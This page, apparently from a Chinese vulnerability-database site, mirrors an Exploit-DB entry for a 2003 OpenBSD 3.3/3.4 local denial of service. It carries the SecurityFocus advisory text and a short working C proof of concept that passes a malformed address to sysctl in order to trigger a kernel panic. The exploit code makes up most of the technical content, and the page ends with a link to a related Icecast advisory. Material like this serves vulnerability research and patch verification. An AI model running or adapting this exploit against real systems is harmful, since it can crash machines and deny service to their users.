OpenBSD 3.3/3.4 – ‘sysctl’ Local Denial of Service

OpenBSD 3.3/3.4 – ‘sysctl’ Local Denial of Service

漏洞ID 1054258 漏洞类型
发布时间 2003-11-19 更新时间 2003-11-19
图片[1]-OpenBSD 3.3/3.4 – ‘sysctl’ Local Denial of Service-安全小百科CVE编号 N/A
图片[2]-OpenBSD 3.3/3.4 – ‘sysctl’ Local Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 OpenBSD CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23389
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9073/info

A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. By invoking systcl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This could be exploited by a malicious unprivileged local user to crash a target system.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated as further information is made available. 

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}

相关推荐: Icecast Server Slash File Name Denial Of Service Vulnerability

Icecast Server Slash File Name Denial Of Service Vulnerability 漏洞ID 1103117 漏洞类型 Input Validation Error 发布时间 2001-06-26 更新时间 2001-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享